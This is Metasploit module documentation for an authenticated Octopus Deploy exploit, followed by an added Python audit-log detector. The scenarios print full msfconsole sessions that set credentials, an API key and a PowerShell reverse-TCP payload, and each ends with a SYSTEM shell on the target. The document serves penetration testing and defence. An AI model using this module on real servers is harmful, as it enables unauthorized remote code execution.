## Vulnerable Application

[Install Octopus Deploy server](https://octopus.com/docs/getting-started#Gettingstarted-InstalltheOctopusserver)

[Create a test user/team](https://octopus.com/docs/administration/managing-users-and-teams) - Team should have "Project contributor" and "Project deployer", or just "System administrator", and add your test user.

[Create an API key](https://octopus.com/docs/how-to/how-to-create-an-api-key)

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: ```use exploit/windows/http/octopusdeploy_deploy```
4. Do: set ```PATH```, ```RHOST```, ```RPORT```, and ```SSL``` if needed
5. Do: set ```STEPNAME``` if desired
6. Do: set ```USERNAME``` and ```PASSWORD``` or just ```APIKEY```
7. Do: ```run```
8. You should get a shell.

## Options

**APIKEY**

API key, which can be generated within the Octopus Deploy application. Can be used instead of a username/password combination.

**USERNAME**

Username of the Octopus Deploy user.

**PASSWORD**

Password of the Octopus Deploy user.

**PATH**

Path to the Octopus Deploy instance. For example, if you sign in to "https://example.com/octopus/app", the value should be "/octopus".

**STEPNAME**

Name of the step to be added to a deployment. This may be visible in the application for a short period of time. A random value will be generated if no value is provided.

**SSL**

Enables or disables SSL. Octopus Deploy server can be configured to listen for HTTP or HTTPS traffic.

## Scenarios

### Octopus Deploy Server 3.16.0

Getting a privileged shell on Octopus Deploy server using administrative credentials.
```
msf > use exploit/windows/http/octopusdeploy_deploy
msf exploit(octopusdeploy_deploy) > set PATH /octoADTest
PATH => /octoADTest
msf exploit(octopusdeploy_deploy) > set USERNAME ODUser
USERNAME => ODUser
msf exploit(octopusdeploy_deploy) > set PASSWORD Password1
PASSWORD => Password1
msf exploit(octopusdeploy_deploy) > set RHOST 10.0.0.12
RHOST => 10.0.0.12
msf exploit(octopusdeploy_deploy) > set RPORT 80
RPORT => 80
msf exploit(octopusdeploy_deploy) > set payload windows/powershell_reverse_tcp
payload => windows/powershell_reverse_tcp
msf exploit(octopusdeploy_deploy) > set LHOST 10.0.0.7
LHOST => 10.0.0.7
msf exploit(octopusdeploy_deploy) > run

[*] Started reverse SSL handler on 10.0.0.7:4444
[*] Getting available projects
[*] Using project TestProject2
[*] Getting steps to TestProject2
[*] Adding step r4XAJc to TestProject2
[*] Getting available channels
[*] Using channel Default
[*] Getting next version
[*] Using version 0.0.2
[*] Creating release
[*] Release Releases-79 created
[*] Deploying TestProject2 version 0.0.2 to TestEnv
[*] Getting updated steps to TestProject2
[*] Deleting step r4XAJc from TestProject2
[*] Step r4XAJc deleted
[*] Powershell session session 1 opened (10.0.0.7:4444 -> 10.0.0.12:59346) at 2017-05-15 19:54:01 -0500

Windows PowerShell running as user WIN-OL1HR5KBTPD$ on WIN-OL1HR5KBTPD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Octopus\ADTest\Work\20170516025358-22>whoami
nt authority\system
PS C:\Octopus\ADTest\Work\20170516025358-22> exit
[*] 10.0.0.12 - Powershell session session 1 closed.  Reason: Died from Errno::ECONNRESET
msf exploit(octopusdeploy_deploy) >
```

Getting a privileged shell on Octopus Deploy server using a sufficiently privileged API key.
```
msf > use exploit/windows/http/octopusdeploy_deploy
msf exploit(octopusdeploy_deploy) > set PATH /octoADTest
PATH => /octoADTest
msf exploit(octopusdeploy_deploy) > set RHOST 10.0.0.12
RHOST => 10.0.0.12
msf exploit(octopusdeploy_deploy) > set RPORT 80
RPORT => 80
msf exploit(octopusdeploy_deploy) > set payload windows/powershell_reverse_tcp
payload => windows/powershell_reverse_tcp
msf exploit(octopusdeploy_deploy) > set LHOST 10.0.0.7
LHOST => 10.0.0.7
msf exploit(octopusdeploy_deploy) > set APIKEY API-FCIQ773M43RKNC4I9KZHQTABC
APIKEY => API-FCIQ773M43RKNC4I9KZHQTABC
msf exploit(octopusdeploy_deploy) > set STEPNAME shell
STEPNAME => shell
msf exploit(octopusdeploy_deploy) > run

[*] Started reverse SSL handler on 10.0.0.7:4444
[*] Getting available projects
[*] Using project TestProject2
[*] Getting steps to TestProject2
[*] Adding step shell to TestProject2
[*] Getting available channels
[*] Using channel Default
[*] Getting next version
[*] Using version 0.0.3
[*] Creating release
[*] Release Releases-80 created
[*] Deploying TestProject2 version 0.0.3 to TestEnv
[*] Getting updated steps to TestProject2
[*] Deleting step shell from TestProject2
[*] Step shell deleted
[*] Powershell session session 1 opened (10.0.0.7:4444 -> 10.0.0.12:59373) at 2017-05-15 19:59:55 -0500

Windows PowerShell running as user WIN-OL1HR5KBTPD$ on WIN-OL1HR5KBTPD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Octopus\ADTest\Work\20170516025952-24>whoami
nt authority\system
PS C:\Octopus\ADTest\Work\20170516025952-24> exit
[*] 10.0.0.12 - Powershell session session 1 closed.  Reason: Died from Errno::ECONNRESET
msf exploit(octopusdeploy_deploy) >
```
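The module output above shows the footprint this technique leaves on the server side: a step is added to a project's deployment process, a release is created and deployed, and the step is deleted again within about half a minute, all under one user or API key. A defender reviewing the Octopus Deploy audit log can look for exactly that burst. The following detector is an added example, not part of the module documentation or of Metasploit or Octopus Deploy; the `AuditEvent` schema, the category/target names and the sample events are constructed for illustration and do not reproduce Octopus's real audit export format, so the parsing would need adapting to the real feed.

```python
"""Flag 'step added -> deployment -> same step removed' bursts in audit events.

A legitimate change to a deployment process normally persists. A step that
exists only long enough for one deployment and is then removed is the shape
seen in the scenario output above and is worth an alert.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class AuditEvent:
    """One simplified audit record (constructed schema, not Octopus's own format)."""
    timestamp: datetime
    user: str
    category: str   # e.g. "Modified", "Created", "Queued"
    target: str     # e.g. "DeploymentProcess", "Release", "Deployment"
    project: str
    detail: str     # step changes use "step added: <name>" / "step removed: <name>"


# Constructed sample modelled on the scenario output above, plus two benign
# process changes that should not fire.
SAMPLE_EVENTS = [
    AuditEvent(datetime(2017, 5, 15, 19, 53, 40), "ODUser", "Modified",
               "DeploymentProcess", "TestProject2", "step added: r4XAJc"),
    AuditEvent(datetime(2017, 5, 15, 19, 53, 45), "ODUser", "Created",
               "Release", "TestProject2", "version 0.0.2"),
    AuditEvent(datetime(2017, 5, 15, 19, 53, 50), "ODUser", "Queued",
               "Deployment", "TestProject2", "environment TestEnv"),
    AuditEvent(datetime(2017, 5, 15, 19, 54, 5), "ODUser", "Modified",
               "DeploymentProcess", "TestProject2", "step removed: r4XAJc"),
    # Benign: an engineer adds a step that stays in the process and deploys.
    AuditEvent(datetime(2017, 5, 15, 10, 0, 0), "alice", "Modified",
               "DeploymentProcess", "Website", "step added: Run DB migrations"),
    AuditEvent(datetime(2017, 5, 15, 10, 5, 0), "alice", "Queued",
               "Deployment", "Website", "environment Staging"),
    # Benign: a step removed hours later with no deployment in between.
    AuditEvent(datetime(2017, 5, 15, 11, 0, 0), "bob", "Modified",
               "DeploymentProcess", "Website", "step added: Warm cache"),
    AuditEvent(datetime(2017, 5, 15, 16, 0, 0), "bob", "Modified",
               "DeploymentProcess", "Website", "step removed: Warm cache"),
]


def find_transient_step_changes(events, window=timedelta(minutes=10)):
    """Return one finding per step that was added, deployed and removed within
    `window` in the same project. Events may arrive in any order."""
    findings = []
    by_project = {}
    for ev in sorted(events, key=lambda e: e.timestamp):
        by_project.setdefault(ev.project, []).append(ev)

    for project, evs in by_project.items():
        for i, added in enumerate(evs):
            if added.target != "DeploymentProcess" or not added.detail.startswith("step added: "):
                continue
            step = added.detail[len("step added: "):]
            deployment = None
            # Walk forward in time until the window closes or the step is removed.
            for later in evs[i + 1:]:
                if later.timestamp - added.timestamp > window:
                    break
                if later.target == "Deployment" and later.category == "Queued":
                    deployment = later
                elif later.target == "DeploymentProcess" and later.detail == f"step removed: {step}":
                    if deployment is not None:
                        findings.append({
                            "project": project,
                            "user": added.user,
                            "step": step,
                            "deployed": deployment.detail,
                            "lifetime_seconds": int((later.timestamp - added.timestamp).total_seconds()),
                        })
                    break
    return findings


if __name__ == "__main__":
    for f in find_transient_step_changes(SAMPLE_EVENTS):
        print(f"[!] {f['project']}: step '{f['step']}' added by {f['user']}, "
              f"deployed ({f['deployed']}) and removed after {f['lifetime_seconds']}s")
```

Run against the sample, only the `TestProject2` burst is reported; the two `Website` changes are ignored because one step persisted and the other was removed hours later with no deployment in between. The window is a tunable: a value of a few minutes catches the automated sequence without flagging an engineer who iterates on a step for an afternoon. The finding carries the acting identity, which is the thing to follow up on: a real user's credentials or an over-privileged API key with project-contributor and deployer rights is what makes the scenario above possible.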